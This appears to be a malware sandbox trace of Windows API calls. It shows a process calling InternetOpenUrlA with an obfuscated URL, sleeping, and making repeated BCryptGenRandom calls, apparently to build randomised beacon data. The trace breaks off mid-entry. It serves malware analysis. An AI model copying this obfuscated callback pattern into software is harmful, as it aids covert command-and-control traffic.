\x03/tSmZxs3lotjaFy6arjkQ/nvcwy67vdt0aeek8B9Mo4jnGljj2jk6g/xKzD9tpQjnCtsd23/01Ruf0cMwZDtjk8I2UZcpcnsahlJd5x/5iTo7fNqvftvl2uc2fnibs3Jq3DHQbnf4rnggyy/" [0191.863] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0191.863] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P\x1d \x03/tSmZxs3lotjaFy6arjkQ/nvcwy67vdt0aeek8B9Mo4jnGljj2jk6g/xKzD9tpQjnCtsd23/01Ruf0cMwZDtjk8I2UZcpcnsahlJd5x/5iTo7fNqvftvl2uc2fnibs3Jq3DHQbnf4rnggyy/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0191.863] GetProcessHeap () returned 0x440000 [0191.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0191.863] GetProcessHeap () returned 0x440000 [0191.863] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01d50 | out: hHeap=0x440000) returned 1 [0191.864] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0191.864] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0191.864] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0191.864] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0191.864] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0191.864] Sleep (dwMilliseconds=0x11636) [0192.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0192.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.087] GetProcessHeap () returned 0x440000 [0192.087] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a175c0 [0192.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.087] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175c1, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a175c1) returned 0x0 [0192.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.386] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.388] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.388] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.389] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.390] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.391] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.392] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.392] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.393] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.393] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.394] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a175ee, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a175ee) returned 0x0 [0192.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0192.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1760c, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a1760c) returned 0x0 [0192.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0192.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0192.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0192.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0192.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: 